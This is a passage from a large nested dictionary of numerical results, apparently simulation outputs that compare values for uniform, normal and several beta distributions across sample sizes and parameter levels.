0.11423138192179594, 'beta4': 0.039323577549201905}, 500: {'uni': 0.06043645792785113, 'nor': 0.10917860950531716, 'beta1': 0.06024574518941972, 'beta2': 0.12114708952686687, 'beta4': 0.04863716851296296}, 400: {'uni': 0.06810271497020282, 'nor': 0.11445445573077262, 'beta1': 0.0680246885765276, 'beta2': 0.12474816718751847, 'beta4': 0.05470345449215924}, 300: {'uni': 0.07806624398748752, 'nor': 0.12160241052743598, 'beta1': 0.07813676478342219, 'beta2': 0.1303621178249335, 'beta4': 0.06435103186819638}, 200: {'uni': 0.09516451469508691, 'nor': 0.13371593064376386, 'beta1': 0.09486007398939739, 'beta2': 0.14197473394490534, 'beta4': 0.08070835746272365}, 150: {'uni': 0.10951349007838795, 'nor': 0.1448092189751769, 'beta1': 0.11000810280674456, 'beta2': 0.15405644251908213, 'beta4': 0.09448304115287848}, 100: {'uni': 0.13402144727255166, 'nor': 0.16360851635146456, 'beta1': 0.13373829847036145, 'beta2': 0.17388573367926863, 'beta4': 0.11887279870190737}, 75: {'uni': 0.1534775863899963, 'nor': 0.18082984868868635, 'beta1': 0.15472434640745825, 'beta2': 0.18922729311202852, 'beta4': 0.14064103105650327}, 50: {'uni': 0.1878076047125296, 'nor': 0.21174139971723732, 'beta1': 0.18900505952391644, 'beta2': 0.21597325299721343, 'beta4': 0.17504570451647083}, 30: {'uni': 0.24109983939699636, 'nor': 0.26128460107527085, 'beta1': 0.24202652974714423, 'beta2': 0.26394060641591655, 'beta4': 0.22998071380591711}, 20: {'uni': 0.29266727403084003, 'nor': 0.3103114840471122, 'beta1': 0.29512024524547165, 'beta2': 0.31286929353450027, 'beta4': 0.2848189838493475}, 10: {'uni': 0.4067165104704334, 'nor': 0.4189143169125569, 'beta1': 0.4090630015368414, 'beta2': 0.42152641633430715, 'beta4': 0.4002321833577583}}, 75: {1000: {'uni': 0.0438399424685616, 'nor': 0.11214377089086885, 'beta1': 0.04280400130427986, 'beta2': 0.11639932218811577, 'beta4': 0.033393127995971994}, 750: {'uni': 0.050249501777054006, 'nor': 0.11453879357778812, 'beta1': 0.0491045026978259, 'beta2': 0.12063794198664923, 'beta4': 0.03872341367170215}, 500: {'uni': 0.06108895227688799, 'nor': 0.12072978462890072, 'beta1': 0.0601270340866209, 'beta2': 0.12562241974534927, 'beta4': 0.04827155944884867}, 400: {'uni': 0.06782565480281566, 'nor': 0.12548350271549236, 'beta1': 0.06724131663497068, 'beta2': 0.12960446320697638, 'beta4': 0.05409657961615677}, 300: {'uni': 0.07851141408408377, 'nor': 0.13200511669657544, 'beta1': 0.077898151231101, 'beta2': 0.13654271371225812, 'beta4': 0.0637511735240166}, 200: {'uni': 0.09475898024659712, 'nor': 0.14327147451372735, 'beta1': 0.09501686919706781, 'beta2': 0.14759803188477688, 'beta4': 0.07871855013071921}, 150: {'uni': 0.10925599343816059, 'nor': 0.15297899030445272, 'beta1': 0.11015254323591961, 'beta2': 0.15768755238961485, 'beta4': 0.09295209765219048}, 100: {'uni': 0.13396368251923452, 'nor': 0.17179721647955526, 'beta1': 0.13345037859887932, 'beta2': 0.17765805845455007, 'beta4': 0.11642943784237603}, 75: {'uni': 0.15477736670546938, 'nor': 0.18895714897457644, 'beta1': 0.1539493080965768, 'beta2': 0.19447171707960897, 'beta4': 0.13724563488543373}, 50: {'uni': 0.18839002568598873, 'nor': 0.2180305171258889, 'beta1': 0.18831553334906875, 'beta2': 0.22129833914948438, 'beta4': 0.17275056471332206}, 30: {'uni': 0.24008961544263907, 'nor': 0.2650822786621322, 'beta1': 0.24252815499954994, 'beta2': 0.2688272811098853, 'beta4': 0.22663105019759328}, 20: {'uni': 0.2921433063597944, 'nor': 0.3141023199173227, 'beta1': 0.29340687139823474, 'beta2': 0.31266965958300064, 'beta4': 0.2804024303421781}, 10: {'uni': 0.41107290577052813, 'nor': 0.4263383340359735, 'beta1': 0.40828688918554545, 'beta2': 0.4250783970409252, 'beta4': 0.3988900709580016}}, 50: {1000: {'uni': 0.045319055803388075, 'nor': 0.13372164617361332, 'beta1': 0.042622363121129214, 'beta2': 0.13054115789301413, 'beta4': 0.03301256635793812}, 750: {'uni': 0.05163228099424677, 'nor': 0.1349664254862753, 'beta1': 0.0496423021703164, 'beta2': 0.13446750687108505, 'beta4': 0.0385279485772233}, 500: {'uni': 0.061439306229550794, 'nor': 0.14055103421779302, 'beta1': 0.060142216296224515, 'beta2': 0.13752593042865568, 'beta4': 0.04724339812053602}, 400: {'uni': 0.0693663795699413, 'nor': 0.14556747938193393, 'beta1': 0.06738356899478581, 'beta2': 0.14143610440720644, 'beta4': 0.053576307903667963}, 300: {'uni': 0.07864177620663654, 'nor': 0.15022792976856758, 'beta1': 0.07821473255565609, 'beta2': 0.1478580791021359, 'beta4': 0.06262935931375649}, 200: {'uni': 0.0953862720353692, 'nor': 0.1622200125881057, 'beta1': 0.09603404932034854, 'beta2': 0.15816299759409325, 'beta4': 0.0773943582431677}, 150: {'uni': 0.11002583704405877, 'nor': 0.17113991351179697, 'beta1': 0.10936894301480282, 'beta2': 0.1687178421219161, 'beta4': 0.09028525692400177}, 100: {'uni': 0.13401450754618016, 'nor': 0.1895698802210114, 'beta1': 0.1344582332361554, 'beta2': 0.18419709322450312, 'beta4': 0.11379130616549382}, 75: {'uni': 0.15488258558714707, 'nor': 0.20362572995006806, 'beta1': 0.1539002041533405, 'beta2': 0.20128361931559535, 'beta4': 0.1333671945439988}, 50: {'uni': 0.18840791165484855, 'nor': 0.23257306685125415, 'beta1': 0.18867436580219135, 'beta2': 0.22835957658151024, 'beta4': 0.16757432345808926}, 30: {'uni': 0.24023168620563118, 'nor': 0.27904847253128273, 'beta1': 0.24006751123167158, 'beta2': 0.2727595659081496, 'beta4': 0.22275659673727644}, 20: {'uni': 0.2940018318983334, 'nor': 0.32479532584592363, 'beta1': 0.2929946618763485, 'beta2': 0.3206467179138732, 'beta4': 0.2753491673001646}, 10: {'uni': 0.4065488810708842, 'nor': 0.43093738566136636, 'beta1': 0.4064636440527985, 'beta2': 0.42567627450176926, 'beta4': 0.3935956418408144}}, 30: {1000: {'uni': 0.04968157954456354, 'nor': 0.1696151004367587, 'beta1': 0.04281863132067795, 'beta2': 0.14689302839678564, 'beta4': 0.03311442937738629}, 750: {'uni': 0.055574487451747534, 'nor': 0.17246364021137395, 'beta1': 0.04952430388104273, 'beta2': 0.15046099536657231, 'beta4': 0.038285428923678255}, 500: {'uni': 0.06478088254077552, 'nor': 0.1737409366264756, 'beta1': 0.0602313802132467, 'beta2': 0.15517477082552145, 'beta4': 0.047192612626946184}, 400: {'uni': 0.07143398822894637, 'nor': 0.1789456292964713, 'beta1': 0.06778902728856115, 'beta2': 0.15742066713207048, 'beta4': 0.05282205994257394}, 300: {'uni': 0.08082785446492691, 'nor': 0.1824810151126436, 'beta1': 0.07787606767722169, 'beta2': 0.16276174102685503, 'beta4': 0.06159728641016676}, 200: {'uni': 0.0974108225516378, 'nor': 0.19235380984611056, 'beta1': 0.09543113477422605, 'beta2': 0.17283803046058355, 'beta4': 0.07550424392452293}, 150: {'uni': 0.11141405928139247, 'nor': 0.20191035833451154, 'beta1': 0.10938230867137078, 'beta2': 0.1820889616226289, 'beta4': 0.08762848356724207}, 100: {'uni': 0.13493046831910993, 'nor': 0.21701554067653117, 'beta1': 0.13386778798076912, 'beta2': 0.19508747959897582, 'beta4': 0.11093409043298663}, 75: {'uni': 0.15528958618348487, 'nor': 0.2299457189815397, 'beta1': 0.15409095027566755, 'beta2': 0.2109482892562924, 'beta4': 0.12881215324966622}, 50: {'uni': 0.18842291872138123, 'nor': 0.2584487077125532, 'beta1': 0.18890320722823578, 'beta2': 0.23827797918175672, 'beta4': 0.16158273294453834}, 30: {'uni': 0.2398366149463353, 'nor': 0.2980088771871361, 'beta1': 0.24200577319830247, 'beta2': 0.28238021073320035, 'beta4': 0.21498111468517844}, 20: {'uni': 0.29227132801590716, 'nor': 0.34432255002709555, 'beta1': 0.2914850392665248, 'beta2': 0.32585452654798963, 'beta4': 0.2669285712544458}, 10: {'uni': 0.40609305573179105, 'nor': 0.447820015199636, 'beta1': 0.40782948526995666, 'beta2': 0.42757111844224754, 'beta4': 0.3886693622267199}}, 20: {1000: {'uni': 0.05775001007007219, 'nor': 0.20319134519921084, 'beta1': 0.048129745899927925, 'beta2': 0.1658497799626829, 'beta4': 0.0329367295696176}, 750: {'uni': 0.062124231199756075, 'nor': 0.20860283378380778, 'beta1': 0.04983248111631, 'beta2': 0.16830562563830098, 'beta4': 0.03824865513096315}, 500: {'uni': 0.0705024643008979, 'nor': 0.21381602181117743, 'beta1': 0.06065658795610929, 'beta2': 0.17239927975361702, 'beta4': 0.04679865268868699}, 400: {'uni': 0.0761771420430718, 'nor': 0.21385203271203002, 'beta1': 0.06752239679804717, 'beta2': 0.17470111438116842, 'beta4': 0.05231551861903025}, 300: {'uni': 0.08596884925259118, 'nor': 0.21991598100008408, 'beta1': 0.07755871126605102, 'beta2': 0.179198373732674, 'beta4': 0.06068391139230339}, 200: {'uni': 0.10080581963801893, 'nor': 0.22897240194696655, 'beta1': 0.09573721958215525, 'beta2': 0.18553633863631513, 'beta4': 0.07462617121595846}, 150: {'uni': 0.114468804467043, 'nor': 0.23631664987390277, 'beta1': 0.10962036209737869, 'beta2': 0.1966018010006519, 'beta4': 0.0870041079920092}, 100: {'uni': 0.13665630970632198, 'nor': 0.2515883777222933, 'beta1': 0.1336228418007765, 'beta2': 0.20881550687413342, 'beta4': 0.10773682421715106}, 75: {'uni': 0.15695962977063316, 'nor': 0.2603016829084427, 'beta1': 0.15508110679604847, 'beta2': 0.22376688776132403, 'beta4': 0.125626481557148}, 50: {'uni': 0.18798876388799624, 'nor': 0.2849538127709019, 'beta1': 0.18882535166765735, 'beta2': 0.24974430328165448, 'beta4': 0.158008406145491}, 30: {'uni': 0.23998853919104884, 'nor': 0.3219977260938881, 'beta1': 0.24135680518002922, 'beta2': 0.2899857898675655, 'beta4': 0.20763359812674523}, 20: {'uni': 0.292373057732106, 'nor': 0.3655787731698917, 'beta1': 0.2924979299262157, 'beta2': 0.3319078417717419, 'beta4': 0.2608606590647614}, 10: {'uni': 0.4061016266543868, 'nor': 0.4671521171088977, 'beta1': 0.4096525764106935, 'beta2': 0.4345673196704135, 'beta4': 0.37937846970295347}}, 10: {1000: {'uni': 0.0913473264369822, 'nor': 0.2964728394162681, 'beta1': 0.09100152658005456, 'beta2': 0.20242925737599682, 'beta4': 0.032700600789628664}, 750: {'uni': 0.09326085272482565, 'nor': 0.29554795490186203, 'beta1': 0.09103352579316204, 'beta2': 0.20619044529626096, 'beta4': 0.037829259115970404}, 500: {'uni': 0.0971331647876415, 'nor': 0.30097993907808684, 'beta1': 0.091049904849404, 'beta2': 0.20699779845573962, 'beta4': 0.04650399550454862}, 400: {'uni': 0.1003597113284248, 'nor': 0.30233932585089107, 'beta1': 0.09107096529100855, 'beta2': 0.20830655812948695, 'beta4': 0.051895391977686056}, 300: {'uni': 0.10721764330695623, 'nor': 0.3073271090395088, 'beta1': 0.09112836953131596, 'beta2': 0.21402715597956734, 'beta4': 0.06001640083268511}, 200: {'uni': 0.11805616667496477, 'nor': 0.3147831503605935, 'beta1': 0.09648796317997815, 'beta2': 0.22109533500255907, 'beta4': 0.07370742701518179}, 150: {'uni': 0.12810610943312417, 'nor': 0.32062575553585454, 'beta1': 0.1103702654857096, 'beta2': 0.22691351867751697, 'beta4': 0.08545929847308015}, 100: {'uni': 0.14756617194854993, 'nor': 0.33197543815379127, 'beta1': 0.135132358543155, 'beta2': 0.23880036275598282, 'beta4': 0.1050005710193368}, 75: {'uni': 0.1661626166131514, 'nor': 0.34126609250236845, 'beta1': 0.15438638517404316, 'beta2': 0.2499089973779972, 'beta4': 0.12149147312793035}, 50: {'uni': 0.19583204530592255, 'nor': 0.3545594670011578, 'beta1': 0.18672230934909217, 'beta2': 0.2730457458179122, 'beta4': 0.1512119547385279}, 30: {'uni': 0.2435600610386478, 'nor': 0.39653189875476424, 'beta1': 0.2404639573254724, 'beta2': 0.3066180700113161, 'beta4': 0.19739374662116618}, 20: {'uni': 0.2932263659568272, 'nor': 0.4283833265615067, 'beta1': 0.29077513214843564, 'beta2': 0.3504847489217736, 'beta4': 0.24789858189847203}, 10: {'uni': 0.4059510050471383, 'nor': 0.51847323520602, 'beta1': 0.40531924075862663, 'beta2': 0.442169996022317, 'beta4': 0.3597039082336214}}}, 0.1: {1000: {1000: {'uni': 0.03865579099473948, 'nor': 0.04689323213481217, 'beta1': 0.03864443104847837, 'beta2': 0.06928001273732087, 'beta4': 0.034746385826709525}, 750: {'uni': 0.04431178998702129, 'nor': 0.05154757047623354, 'beta1': 0.04471651202934612, 'beta2': 0.07068001177091865, 'beta4': 0.04061642187839365}, 500: {'uni': 0.05449621343988875, 'nor': 0.06052185385730591, 'beta1': 0.054284378799021704, 'beta2': 0.07627185785494306, 'beta4': 0.05066709479143283}, 400: {'uni': 0.06094293297893738, 'nor': 0.06655379885026683, 'beta1': 0.06063207438253193, 'beta2': 0.0805230789692084, 'beta4': 0.057268551423413916}, 300: {'uni': 0.07035612682535114, 'nor': 0.07484946592814268, 'beta1': 0.07012629576924828, 'beta2': 0.08695683101854024, 'beta4': 0.06723411467423446}, 200: {'uni': 0.0856850266615582, 'nor': 0.08920392339205196, 'beta1': 0.08598961798425064, 'beta2': 0.09957077044100182, 'beta4': 0.0828676651996616}, 150: {'uni': 0.09851344951124391, 'nor': 0.10245978909640735, 'beta1': 0.09874089203017197, 'beta2': 0.11143243172461781, 'beta4': 0.09626599766980459}, 100: {'uni': 0.1210111549309712, 'nor': 0.12298171658155477, 'beta1': 0.12043414875564495, 'beta2': 0.1308096653595, 'beta4': 0.11838570937570658}, 75: {'uni': 0.13938671579559747, 'nor': 0.14217000359022663, 'beta1': 0.138725193479173, 'beta2': 0.1471890814905698, 'beta4': 0.1371285598122392}, 50: {'uni': 0.16966268801360024, 'nor': 0.17032733000500144, 'beta1': 0.16965634639647975, 'beta2': 0.17659318599354473, 'beta4': 0.16779361043827323}, 30: {'uni': 0.21937716053448017, 'nor': 0.2191535761895615, 'beta1': 0.21730939148151623, 'beta2': 0.22312364454880895, 'beta4': 0.21786573953931154}, 20: {'uni': 0.26624534959584256, 'nor': 0.2653268175644278, 'beta1': 0.26474433641392037, 'beta2': 0.26812009306025597, 'beta4': 0.26194067601195037}, 10: {'uni': 0.36801398201907515, 'nor': 0.3709069141739802, 'beta1': 0.3668592370274731, 'beta2': 0.37064040545123844, 'beta4': 0.36704323242150666}}, 750: {1000: {'uni': 0.038578042981164296, 'nor': 0.048914303251900604, 'beta1': 0.03853302192863617, 'beta2': 0.0688056514749229, 'beta4': 0.0338622699562493}, 750: {'uni': 0.04442141557686974, 'nor': 0.05374944654503383, 'beta1': 0.044374748815966814, 'beta2': 0.07026684762315227, 'beta4': 0.03979048728222595}, 500: {'uni': 0.054286956718598955, 'nor': 0.06212763227553719, 'beta1': 0.054253588244283946, 'beta2': 0.07656236068086564, 'beta4': 0.049939942721689445}, 400: {'uni': 0.06083366825985448, 'nor': 0.06788419585350336, 'beta1': 0.060660028681503775, 'beta2': 0.08068669745769219, 'beta4': 0.05675736877098636}, 300: {'uni': 0.06993166265169576, 'nor': 0.07680384961751496, 'beta1': 0.07010161417489508, 'beta2': 0.0880572291137307, 'beta4': 0.06596363343773998}, 200: {'uni': 0.0851211251657536, 'nor': 0.09099559217968667, 'beta1': 0.08536971610728128, 'beta2': 0.10062359974481189, 'beta4': 0.08250279408907268}, 150: {'uni': 0.09831231905867402, 'nor': 0.10383736756173939, 'beta1': 0.09899967339806359, 'beta2': 0.11139402129433418, 'beta4': 0.09586157739072232}, 100: {'uni': 0.12095357943723123, 'nor': 0.12436567324838821, 'beta1': 0.12052591808871516, 'beta2': 0.13100845891806429, 'beta4': 0.11773670273834078}, 75: {'uni': 0.13940484887133242, 'nor': 0.14155145908354727, 'beta1': 0.13837916177477272, 'beta2': 0.14796493865747803, 'beta4': 0.13654473331430828}, 50: {'uni': 0.16894951238844866, 'nor': 0.17265459646884784, 'beta1': 0.16961105932607348, 'beta2': 0.17656490288692311, 'beta4': 0.1674972244617925}, 30: {'uni': 0.21651765294813125, 'nor': 0.21939168771962442, 'beta1': 0.21729204037445293, 'beta2': 0.22349957660235154, 'beta4': 0.21623428560039515}, 20: {'uni': 0.2642786935555307, 'nor': 0.2675799785148938, 'beta1': 0.26561099996019183, 'beta2': 0.2691253631613714, 'beta4': 0.2645344136768742}, 10: {'uni': 0.3695291099836718, 'nor': 0.3711051681589676, 'beta1': 0.37110270903505804, 'beta2': 0.3730098056299037, 'beta4': 0.3662152768074211}}, 500: {1000: {'uni': 0.03836341807194299, 'nor': 0.05288441357758422, 'beta1': 0.03855355377252884, 'beta2': 0.07246101460269183, 'beta4': 0.03331891444897561}, 750: {'uni': 0.0444146556451972, 'nor': 0.05765382477238595, 'beta1': 0.04441014342661165, 'beta2': 0.07465473765203068, 'beta4': 0.03861388373348723}, 500: {'uni': 0.05438833618427541, 'nor': 0.06550856448266529, 'beta1': 0.05429312306612194, 'beta2': 0.08110283704211807, 'beta4': 0.048644471904955966}, 400: {'uni': 0.06077670141165842, 'nor': 0.07181845544231241, 'beta1': 0.06061997617710235, 'beta2': 0.08578519852772415, 'beta4': 0.05521030797490445}, 300: {'uni': 0.07041595748509133, 'nor': 0.07946505900730128, 'beta1': 0.0704016017009636, 'beta2': 0.09209979263017587, 'beta4': 0.06483174788141038}, 200: {'uni': 0.08563012945992199, 'nor': 0.0940723299141569, 'beta1': 0.08541074081441047, 'beta2': 0.10458447320510883, 'beta4': 0.08098282824897673}, 150: {'uni': 0.09899026948327977, 'nor': 0.10562357103466236, 'beta1': 0.09861292652287168, 'beta2': 0.11632528204922898, 'beta4': 0.0940489883300496}, 100: {'uni': 0.12076176494614121, 'nor': 0.1257258205330381, 'beta1': 0.12054780424559441, 'beta2': 0.13468669896864294, 'beta4': 0.11652043544137913}, 75: {'uni': 0.13920364976539873, 'nor': 0.1451998235260331, 'beta1': 0.13872567771909045, 'beta2': 0.15128300093267993, 'beta4': 0.13571279744636144}, 50: {'uni': 0.16954390111422946, 'nor': 0.172692463113301, 'beta1': 0.1693168682908624, 'beta2': 0.17976834049282708, 'beta4': 0.16609850304544527}, 30: {'uni': 0.21709640413871756, 'nor': 0.22184138531054348, 'beta1': 0.21757402187586894, 'beta2': 0.22444521991819788, 'beta4': 0.21392411551684015}, 20: {'uni': 0.2636520645162054, 'nor': 0.26652594436945887, 'beta1': 0.265223822071589, 'beta2': 0.2721218328512449, 'beta4': 0.2627686738338032}, 10: {'uni': 0.36726905749678107, 'nor': 0.3699346949326602, 'beta1': 0.36849489074859143, 'beta2': 0.3705089961045096, 'beta4': 0.3683244510638542}}, 400: {1000: {'uni': 0.038671955406556435, 'nor': 0.055340672020988524, 'beta1': 0.03839858850395489, 'beta2': 0.07292338725212977, 'beta4': 0.032563312918836074}, 750: {'uni': 0.04481109074042289, 'nor': 0.05989416561151395, 'beta1': 0.04447627902390899, 'beta2': 0.07495569974438154, 'beta4': 0.03825050788799533}, 500: {'uni': 0.05452739978724558, 'nor': 0.06844117462965149, 'beta1': 0.05427711866364415, 'beta2': 0.08075667657637409, 'beta4': 0.04799001758839683}, 400: {'uni': 0.0611511660781307, 'nor': 0.07331590982555752, 'beta1': 0.060592106128168455, 'beta2': 0.08541781550168484, 'beta4': 0.05429207860179752}, 300: {'uni': 0.07033185789840113, 'nor': 0.08155939051842442, 'beta1': 0.07020664995088899, 'beta2': 0.09207127639350217, 'beta4': 0.06368267547644724}, 200: {'uni': 0.08544638993146081, 'nor': 0.09571715041830708, 'beta1': 0.08570866106209285, 'beta2': 0.10630400769293069, 'beta4': 0.08024458505578957}, 150: {'uni': 0.09829333569563875, 'nor': 0.10653764892501733, 'beta1': 0.09928267092865872, 'beta2': 0.11707715788245693, 'beta4': 0.09396885720717318}, 100: {'uni': 0.12080421136273911, 'nor': 0.12821500349277992, 'beta1': 0.12103112779938607, 'beta2': 0.13533651452822992, 'beta4': 0.11606955631404037}, 75: {'uni': 0.13856046617279955, 'nor': 0.1448041375046114, 'beta1': 0.13960085219794205, 'beta2': 0.152159478857264, 'beta4': 0.13494084962417124}, 50: {'uni': 0.1693496286995576, 'nor': 0.17474469922632208, 'beta1': 0.16895412831719117, 'beta2': 0.17830731451150195, 'beta4': 0.1659480783288083}, 30: {'uni': 0.21819978784843835, 'nor': 0.2231518999196621, 'beta1': 0.21831546700467166, 'beta2': 0.2266742699981823, 'beta4': 0.21494937232251626}, 20: {'uni': 0.2667842124402274, 'nor': 0.2684191444539494, 'beta1': 0.2645995976816778, 'beta2': 0.27338561154866864, 'beta4': 0.26360661161857973}, 10: {'uni': 0.3669373614601618, 'nor': 0.37176690566406345, 'beta1': 0.3677474444699915, 'beta2': 0.3747266621010322, 'beta4': 0.3684049267602626}}, 300: {1000: {'uni': 0.038568146042191165, 'nor': 0.06033077287311639, 'beta1': 0.03858815015821093, 'beta2': 0.07552788266669708, 'beta4': 0.032200314601627644}, 750: {'uni': 0.04470027622900535, 'nor': 0.06449447691372501, 'beta1': 0.04445980130759988, 'beta2': 0.07824363987830985, 'beta4': 0.037629338463132156}, 500: {'uni': 0.05445235908316243, 'nor': 0.07219718892016075, 'beta1': 0.054262938865397015, 'beta2': 0.08422237701364471, 'beta4': 0.047142226840530044}, 400: {'uni': 0.06066467596958125, 'nor': 0.07755227668883014, 'beta1': 0.060492785543729444, 'beta2': 0.08820282905569876, 'beta4': 0.0537567311081823}, 300: {'uni': 0.06977557375995519, 'nor': 0.08485533637785325, 'beta1': 0.06951934425266007, 'beta2': 0.09812061998557053, 'beta4': 0.06253013614048619}, 200: {'uni': 0.085560824769008, 'nor': 0.09806835521037083, 'beta1': 0.08569790505589447, 'beta2': 0.10952789442497846, 'beta4': 0.07876260453935757}, 150: {'uni': 0.09861884343747088, 'nor': 0.10976436498857722, 'beta1': 0.09868041617950538, 'beta2': 0.11941996964693702, 'beta4': 0.09215823777804794}, 100: {'uni': 0.12082163981848504, 'nor': 0.12942192768323635, 'beta1': 0.12068117757143665, 'beta2': 0.1385783464518442, 'beta4': 0.11497977710795462}, 75: {'uni': 0.1387394671775295, 'nor': 0.14749930743714523, 'beta1': 0.13839845771793613, 'beta2': 0.15556474644945018, 'beta4': 0.13341435974554122}, 50: {'uni': 0.1697760858230185, 'nor': 0.17696687496485167, 'beta1': 0.17005727177394436, 'beta2': 0.18213762748458961, 'beta4': 0.16456011116133662}, 30: {'uni': 0.21841433839440783, 'nor': 0.22294642276220844, 'beta1': 0.21767910026340637, 'beta2': 0.2267095097296688, 'beta4': 0.21367190022853494}, 20: {'uni': 0.26434835889323316, 'nor': 0.2703508019917835, 'beta1': 0.2657962071894101, 'beta2': 0.27291680141430064, 'beta4': 0.2608999363528367}, 10: {'uni': 0.366851595427454, 'nor': 0.3698626345274391, 'beta1': 0.3671514175821456, 'beta2': 0.3737902254897134, 'beta4': 0.36667318670050814}}, 200: {1000: {'uni': 0.03854748922549689, 'nor': 0.06826609819066709, 'beta1': 0.038509650033551, 'beta2': 0.08137799639220133, 'beta4': 0.03162300254061415}, 750: {'uni': 0.04473955552343811, 'nor': 0.07200790785222766, 'beta1': 0.04438496783157364, 'beta2': 0.08407305489878691, 'beta4': 0.03667915924788884}, 500: {'uni': 0.054603748253756024, 'nor': 0.07895892719006692, 'beta1': 0.05455329073640525, 'beta2': 0.09050017429835211, 'beta4': 0.0460887620966024}, 400: {'uni': 0.06068150539987971, 'nor': 0.08357529343486114, 'beta1': 0.0607004483760466, 'beta2': 0.09547446895325118, 'beta4': 0.052385584132791485}, 300: {'uni': 0.06982758157167712, 'nor': 0.0910022478908723, 'beta1': 0.06999218391151302, 'beta2': 0.10311006289652225, 'beta4': 0.06142711299550374}, 200: {'uni': 0.0850781158120894, 'nor': 0.10365599068508824, 'beta1': 0.08590109771629173, 'beta2': 0.1149287508099453, 'beta4': 0.0770323488052646}, 150: {'uni': 0.0993944312574237, 'nor': 0.11435325767762983, 'beta1': 0.09924451816247526, 'beta2': 0.12522181631529639, 'beta4': 0.09022268035640774}, 100: {'uni': 0.1200373195770541, 'nor': 0.1336212549639687, 'beta1': 0.12101160493161028, 'beta2': 0.14360115025497422, 'beta4': 0.11282854715360996}, 75: {'uni': 0.13803069827511782, 'nor': 0.15135686336876558, 'beta1': 0.13969975342935437, 'beta2': 0.1581734543425124, 'beta4': 0.1311769883842281}, 50: {'uni': 0.17000076548600052, 'nor': 0.18005695698050672, 'beta1': 0.16957807122266255, 'beta2': 0.18526189089470024, 'beta4': 0.1623745159068773}, 30: {'uni': 0.2185664583080269, 'nor': 0.22568866441722213, 'beta1': 0.21591449849525435, 'beta2': 0.23093983759970643, 'beta4': 0.213118806872053}, 20: {'uni': 0.26291321552377933, 'nor': 0.27125311697510335, 'beta1': 0.265078403464129, 'beta2': 0.2748140209145749, 'beta4': 0.25847640298998725}, 10: {'uni': 0.3701815312790644, 'nor': 0.3735972474840512, 'beta1': 0.36772406840807353, 'beta2': 0.37422364182301204, 'beta4': 0.36496493955486975}}, 150: {1000: {'uni': 0.038671137731641714, 'nor': 0.07489217671007431, 'beta1': 0.038714599773274294, 'beta2': 0.08587393355161688, 'beta4': 0.031043016499080256}, 750: {'uni': 0.04433800928987097, 'nor': 0.07869757447476963, 'beta1': 0.04435075697917096, 'beta2': 0.0888959352720804, 'beta4': 0.0363140391204399}, 500: {'uni': 0.05430754404756716, 'nor': 0.08479608059147858, 'beta1': 0.05449721924927653, 'beta2': 0.09800285567074296, 'beta4': 0.04543347855755667}, 400: {'uni': 0.060705891345482654, 'nor': 0.08917510453779187, 'beta1': 0.060434538413570604, 'beta2': 0.10037917578431343, 'beta4': 0.051204096787690445}, 300: {'uni': 0.07049246163826528, 'nor': 0.09606124979171526, 'beta1': 0.07009292436806885, 'beta2': 0.1069080677782065, 'beta4': 0.05999502715904392}, 200: {'uni': 0.08586052698148705, 'nor': 0.10900056975883626, 'beta1': 0.08626264567064978, 'beta2': 0.11987083383282779, 'beta4': 0.07554909088250805}, 150: {'uni': 0.09875402367188635, 'nor': 0.11962698211682443, 'beta1': 0.09823214833546662, 'beta2': 0.12903038650506438, 'beta4': 0.08871159962248731}, 100: {'uni': 0.12052514898174571, 'nor': 0.13889683791136048, 'beta1': 0.12060529630888162, 'beta2': 0.14704712969881378, 'beta4': 0.11045343255041773}, 75: {'uni': 0.1384992792451861, 'nor': 0.15478420535093318, 'beta1': 0.13894749406062784, 'beta2': 0.1622177087017118, 'beta4': 0.12957103132509315}, 50: {'uni': 0.1696445420380115, 'nor': 0.1826703268000962, 'beta1': 0.16956250951500046, 'beta2': 0.18912522574118165, 'beta4': 0.16076304630746918}, 30: {'uni': 0.21708843420467044, 'nor': 0.22747076876879424, 'beta1': 0.2162197472621421, 'beta2': 0.23011438026305547, 'beta4': 0.21038257831299034}, 20: {'uni': 0.2635940728771885, 'nor': 0.27181622559884444, 'beta1': 0.2656550529386193, 'beta2': 0.27590232647329493, 'beta4': 0.2610592031194704}, 10: {'uni': 0.36957283113407985, 'nor': 0.3755749715318515, 'beta1': 0.3694332288882942, 'beta2': 0.3745828156724571, 'beta4': 0.362866754497916}}, 100: {1000: {'uni': 0.0391852789896201, 'nor': 0.08748278815593058, 'beta1': 0.03835204486107713, 'beta2': 0.09059314017831821, 'beta4': 0.030871329427173577}, 750: {'uni': 0.04487620054963998, 'nor': 0.09008413022094708, 'beta1': 0.044419301053983895, 'beta2': 0.0938143285125057, 'beta4': 0.035651375677830055}, 500: {'uni': 0.05445853301054582, 'nor': 0.09612181255635743, 'beta1': 0.05460984209093778, 'beta2': 0.10218771914762725, 'beta4': 0.04452799083539005}, 400: {'uni': 0.060889521772825805, 'nor': 0.10031899779947095, 'beta1': 0.060948683104371126, 'beta2': 0.10541070962786026, 'beta4': 0.05012038630616317}, 300: {'uni': 0.07005128941367278, 'nor': 0.10658935036183773, 'beta1': 0.07009895459384657, 'beta2': 0.11170488328681916, 'beta4': 0.05864521177984011}, 200: {'uni': 0.08540225344537783, 'nor': 0.11890199866834528, 'beta1': 0.08502320710520805, 'beta2': 0.12395353434803436, 'beta4': 0.07387574145690157}, 150: {'uni': 0.09885046476067078, 'nor': 0.12839494402381713, 'beta1': 0.09934985587864284, 'beta2': 0.13434579187022588, 'beta4': 0.08566408819803323}, 100: {'uni': 0.12047137314751694, 'nor': 0.14581363150714843, 'beta1': 0.12030434397784306, 'beta2': 0.1511774251514193, 'beta4': 0.10729772293868556}, 75: {'uni': 0.13900232220953807, 'nor': 0.16310365822781592, 'beta1': 0.13886677230092376, 'beta2': 0.16609733213725825, 'beta4': 0.12653611564166728}, 50: {'uni': 0.16926530053780198, 'nor': 0.1894194492417549, 'beta1': 0.1702780520534074, 'beta2': 0.19236637904828646, 'beta4': 0.1577775823414037}, 30: {'uni': 0.21805620163425476, 'nor': 0.23303141581452969, 'beta1': 0.21774239331391093, 'beta2': 0.23521808252559517, 'beta4': 0.20825701308967687}, 20: {'uni': 0.2643242332020047, 'nor': 0.27896279120794987, 'beta1': 0.2652844445947362, 'beta2': 0.27899677620691904, 'beta4': 0.2564356340644192}, 10: {'uni': 0.36868660537699743, 'nor': 0.3801425407117649, 'beta1': 0.3691995028759322, 'beta2': 0.37929775988096986, 'beta4': 0.3638553742502826}}, 75: {1000: {'uni': 0.03947518275469575, 'nor': 0.0972287182231617, 'beta1': 0.03864849717150598, 'beta2': 0.0952234254591443, 'beta4': 0.030504505239134838}, 750: {'uni': 0.04551965251101908, 'nor': 0.10116693467733584, 'beta1': 0.04443711038356635, 'beta2': 0.09869508499069957, 'beta4': 